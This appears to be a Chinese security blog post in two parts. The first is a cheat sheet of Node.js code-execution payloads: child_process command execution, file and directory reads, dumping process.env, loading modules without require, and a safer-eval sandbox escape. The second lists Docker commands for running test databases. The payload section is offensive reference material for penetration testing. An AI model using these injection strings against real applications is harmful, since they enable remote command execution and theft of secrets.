nodejs 代码执行利用
贴一下之前总结关于nodejs利用的知识点
require("child_process").exec("whoami")toString()
require("child_process").execSync("dir").toString()
windows
require("child_process").execFileSync("cmd",["/C","dir"]).toString()
require("child_process").spawnSync("cmd",["/C","dir"])["output"][1].toString()
无回现
require("child_process").spawn("cmd",["/C","calc"])
require("child_process").execFile("cmd",["/C","calc"]) //要运行的可执行文件的名称或路径。
列目录
require("fs").readdirSync('C:\\')
读文件
require("fs").readFileSync("123.txt").toString()
利用 process 获取敏感信息
process.env
process.cwd()
process.arch
process.version
process.geteuid()
没有require下引入模块
global.process.mainModule.constructor._load('child_process').exec('calc')
没有process
toString.constructor('return process')().mainModule.constructor._load('child_process').execSync('whoami')
绕过沙盒 safer-eval
toString.constructor('return process')().mainModule.constructor._load('child_process').execSync('whoami')
Docker-常见数据库的快速搭建
mysql8
docker run -dit --name mysql8 -e MYSQL_ROOT_PASSWORD=password haakco/mysql80
docker exec -it mysql8 bash -c "mysql -u root -p"
开启远程连接
ALTER USER 'root'@'%' IDENTIFIED WITH mysql_native_password by 'password';
PostgreSQL
docker run --name postgresql -itd --restart always --publish 5432:5432 --volume postgresql:/var/lib/postgresql sameersbn/postgresql:12-20200524
docker exec -it postgresql sudo -u postgres psql
Mssql
需要内存较高
docker run --name mssql -e 'ACCEPT_EULA=Y' -e 'SA_PASSWORD=password' -e 'MSSQL_PID=Express' -p 1433:1433 -d microsoft/mssql-server-linux
docker exec -it mssql /opt/mssql-tools/bin/sqlcmd -S localhost -U sa -P password
Redis
docker run --name some-redis -d redis
docker exec -it some-redis redis-cli
Sqlite3
docker run --name sqlite3 -it nouchka/sqlite3 sqlite3
Oracle
docker pull alexeiled/docker-oracle-xe-11g
docker run -h "oracle" --name "oracle" -d -p 49160:22 -p 49161:1521 -p 49162:8080 alexeiled/docker-oracle-xe-11g
docker exec -it oracle bash
进入docker 执行
sqlplus system/oracle
MongoDB
构建
docker run -d \
--name mongodb \
-p 27017:27017 \
-e MONGODB_USERNAME=myusername \
-e MONGODB_PASSWORD=mypassword \
frodenas/mongodb
运行
docker exec -it mongodb /bin/bash -c 'mongo 127.0.0.1/admin -u myusername -p
MongoDB shell version: 3.0.7
Enter password:
connecting to: 127.0.0.1/admin
>mypassword